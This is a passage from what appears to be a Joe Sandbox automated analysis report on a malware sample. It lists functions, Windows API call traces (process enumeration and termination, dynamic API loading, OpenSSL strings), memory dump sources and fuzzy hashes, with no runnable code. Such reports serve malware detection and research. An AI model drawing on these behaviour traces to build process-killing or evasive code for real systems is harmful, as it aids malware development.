                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00E424C1
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E424CD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                            • String ID: cmd.exe
                                                                                                                            • API String ID: 2696918072-723907552
                                                                                                                            • Opcode ID: c9d87361e7021a713bf8caed409f7d42c6274d2d605654fb45c47ee8f22b7358
                                                                                                                            • Instruction ID: 91e548f360d6a714f737575bd5fda07f56d63bed21594c78424a1f00dda229ef
                                                                                                                            • Opcode Fuzzy Hash: c9d87361e7021a713bf8caed409f7d42c6274d2d605654fb45c47ee8f22b7358
                                                                                                                            • Instruction Fuzzy Hash: 5D0192355012197FE7206BA1BD89FBE767CDF48715F200055FE08F2142EA6489498AB1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 00E3F338
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00E3F353
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                            • API String ID: 2574300362-2555811374
                                                                                                                            • Opcode ID: 86211538f0e30778fe9ae782c4977a73b9b76b22f50572fce856efdd9e8ce92c
                                                                                                                            • Instruction ID: 2996a98d66a5c3af57b6aa78193b6ada169a6fec803a2abee1c802ff48923caa
                                                                                                                            • Opcode Fuzzy Hash: 86211538f0e30778fe9ae782c4977a73b9b76b22f50572fce856efdd9e8ce92c
                                                                                                                            • Instruction Fuzzy Hash: E7C13A71D01209EBDF00DFA4ED9ABDEBBF5AF14308F205429E805B7151EB75AA18CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$__except_handler4_fprintf
                                                                                                                            • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                            • API String ID: 1783060780-3771355929
                                                                                                                            • Opcode ID: e856ffb1866552a666b4b7da472361965519a5748382a15db252f02c5ed71bdc
                                                                                                                            • Instruction ID: 26b0c8bc955f0d34b4682e1a62c2ea927fc8bd3e48c66f00a94993fb06388e36
                                                                                                                            • Opcode Fuzzy Hash: e856ffb1866552a666b4b7da472361965519a5748382a15db252f02c5ed71bdc
                                                                                                                            • Instruction Fuzzy Hash: 1CA182B1C00249DBEF11EFE4D84ABDEBFB4AF15314F141428E50977292E7B65648CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E93350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                            • API String ID: 909875538-2908105608
                                                                                                                            • Opcode ID: 4fade79462c507a1b9491f0bf64d1c02af711505d0d9a9bdf513ce534c8b0906
                                                                                                                            • Instruction ID: 0a72e0647f19ddab88525170d2081c11e251486d7a49b788c6da61aa0cb8d7f8
                                                                                                                            • Opcode Fuzzy Hash: 4fade79462c507a1b9491f0bf64d1c02af711505d0d9a9bdf513ce534c8b0906
                                                                                                                            • Instruction Fuzzy Hash: 5B4127A5BC834129FF326539BC03FD677C55B60B28F096461F79CF91C2E68185878292
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E55141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __init_pointers.LIBCMT ref: 00E55141
                                                                                                                              • Part of subcall function 00E57D6C: EncodePointer.KERNEL32(00000000,?,00E55146,00E53FFE,00F37990,00000014), ref: 00E57D6F
                                                                                                                              • Part of subcall function 00E57D6C: __initp_misc_winsig.LIBCMT ref: 00E57D8A
                                                                                                                              • Part of subcall function 00E57D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E626B3
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E626C7
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E626DA
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E626ED
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E62700
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E62713
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E62726
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E62739
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E6274C
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E6275F
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E62772
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E62785
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E62798
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E627AB
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E627BE
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E627D1
                                                                                                                            • __mtinitlocks.LIBCMT ref: 00E55146
                                                                                                                            • __mtterm.LIBCMT ref: 00E5514F
                                                                                                                              • Part of subcall function 00E551B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E55154,00E53FFE,00F37990,00000014), ref: 00E58B62
                                                                                                                              • Part of subcall function 00E551B7: _free.LIBCMT ref: 00E58B69
                                                                                                                              • Part of subcall function 00E551B7: DeleteCriticalSection.KERNEL32(00F3AC00,?,?,00E55154,00E53FFE,00F37990,00000014), ref: 00E58B8B
                                                                                                                            • __calloc_crt.LIBCMT ref: 00E55174
                                                                                                                            • __initptd.LIBCMT ref: 00E55196
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00E5519D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3567560977-0
                                                                                                                            • Opcode ID: d63201e6a723e8847698c87de1bae75f077156d42440aed04bfc82554bd6a075
                                                                                                                            • Instruction ID: b0eab2809a8830b5b3d5754555c44a9ce1605f51089a7a2721b756d161a78278
                                                                                                                            • Opcode Fuzzy Hash: d63201e6a723e8847698c87de1bae75f077156d42440aed04bfc82554bd6a075
                                                                                                                            • Instruction Fuzzy Hash: 2BF0F03314AF112DE234B774BE23B9A2AD09F01737B202E19FC64F51D1EF2084494591
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E553AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 00E5594A
                                                                                                                              • Part of subcall function 00E58AF7: __mtinitlocknum.LIBCMT ref: 00E58B09
                                                                                                                              • Part of subcall function 00E58AF7: __amsg_exit.LIBCMT ref: 00E58B15
                                                                                                                              • Part of subcall function 00E58AF7: EnterCriticalSection.KERNEL32(?,?,00E550D7,0000000D), ref: 00E58B22
                                                                                                                            • _free.LIBCMT ref: 00E55970
                                                                                                                              • Part of subcall function 00E50BED: HeapFree.KERNEL32(00000000,00000000,?,00E5507F,00000000,00E5500D,?,00E53F7C,?,00E4E6CC,00000000), ref: 00E50C01
                                                                                                                              • Part of subcall function 00E50BED: GetLastError.KERNEL32(00000000,?,00E5507F,00000000,00E5500D,?,00E53F7C,?,00E4E6CC,00000000,?,?,?,?,?,00EFB3EC), ref: 00E50C13
                                                                                                                            • __lock.LIBCMT ref: 00E55989
                                                                                                                            • ___removelocaleref.LIBCMT ref: 00E55998
                                                                                                                            • ___freetlocinfo.LIBCMT ref: 00E559B1
                                                                                                                            • _free.LIBCMT ref: 00E559C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 626533743-0
                                                                                                                            • Opcode ID: 070a73fba6b2c3d6d64e169e84a846ebf6b576a2d8dad87ebc29e3275872a0fa
                                                                                                                            • Instruction ID: a58d454edde0dc8f8c8e37ebebf71685a4f1aafed5ac7c47da02fb988ea650bc
                                                                                                                            • Opcode Fuzzy Hash: 070a73fba6b2c3d6d64e169e84a846ebf6b576a2d8dad87ebc29e3275872a0fa
                                                                                                                            • Instruction Fuzzy Hash: A7018B32102B00E6DA35AB68D566B1D73E05F8073BF206E0EFC75761E1CFB889889A51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E873F0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: $+$0123456789ABCDEF$Ul
                                                                                                                            • API String ID: 1302938615-2110468602
                                                                                                                            • Opcode ID: 10e94143940cbf3c7c05db9d731cf3a373c67f39068bfe037c0cff1dc3823257
                                                                                                                            • Instruction ID: e1215761c2c324a73706096f004da9db99abdaa719f2838b8e8e3748918a0153
                                                                                                                            • Opcode Fuzzy Hash: 10e94143940cbf3c7c05db9d731cf3a373c67f39068bfe037c0cff1dc3823257
                                                                                                                            • Instruction Fuzzy Hash: 80819DB1A087508FD710DF289840A2BBBE5BFC8758F25196DF9DDA7252D330ED058B92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E806A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 00E807C3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                            • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                            • API String ID: 601868998-2416195885
                                                                                                                            • Opcode ID: 69a75c5abaff2e86c6c044dae104e63f50e68660e764387e259c521c112a5176
                                                                                                                            • Instruction ID: ecc511395cda6c04a22a3070bbdf1fa0370bbe36e2b6c08f5b80ce01e2399615
                                                                                                                            • Opcode Fuzzy Hash: 69a75c5abaff2e86c6c044dae104e63f50e68660e764387e259c521c112a5176
                                                                                                                            • Instruction Fuzzy Hash: C441C471A443055BD724FE14DC45BAFB3D8AF85749F00186EF58DB3141E675E9088BE2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E6B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00E6B70B
                                                                                                                              • Part of subcall function 00E50C62: __FF_MSGBANNER.LIBCMT ref: 00E50C79
                                                                                                                              • Part of subcall function 00E50C62: __NMSG_WRITE.LIBCMT ref: 00E50C80
                                                                                                                              • Part of subcall function 00E50C62: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,00000000,00000000,?,00E58CF4,00000000,00000000,00000000,00000000,?,00E58BE1,00000018,00F37BD0), ref: 00E50CA5
                                                                                                                            • _free.LIBCMT ref: 00E6B71E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1020059152-0
                                                                                                                            • Opcode ID: caa89072b90875fca63cdea284174592f71285572c7d9289e00fdf29674a2f2f
                                                                                                                            • Instruction ID: 4e0ed65b88e0772b8d5604ebbc34c6b38943fdef9f1ceb97c7efbcd1f7f04d6b
                                                                                                                            • Opcode Fuzzy Hash: caa89072b90875fca63cdea284174592f71285572c7d9289e00fdf29674a2f2f
                                                                                                                            • Instruction Fuzzy Hash: 3E11E332485719AFCB202B74BC44A6A3BE4AF913A5F202B26FD44F6161DF30A8848790
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E4F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00E4F085
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4F0AC
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00E4F0B6
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4F0C4
                                                                                                                            • WaitForSingleObject.KERNEL32(0000000A), ref: 00E4F0D2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: a5813a21410a4104a408fcdc553dfb359931b2111eabf880818c68c90d91a9af
                                                                                                                            • Instruction ID: 661fe631a88097d6b97545417c2cd34e5f93b0f3edcf3993be594c2a827c3ef1
                                                                                                                            • Opcode Fuzzy Hash: a5813a21410a4104a408fcdc553dfb359931b2111eabf880818c68c90d91a9af
                                                                                                                            • Instruction Fuzzy Hash: B501D635A4131D7AEB309B55EC4AFA63BACEB94B04F204011FE00BB1D1D7F5A909DBA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E4E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00E4E515
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4E53C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00E4E546
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4E554
                                                                                                                            • WaitForSingleObject.KERNEL32(0000000A), ref: 00E4E562
                                                                                                                            Memory Dump Source
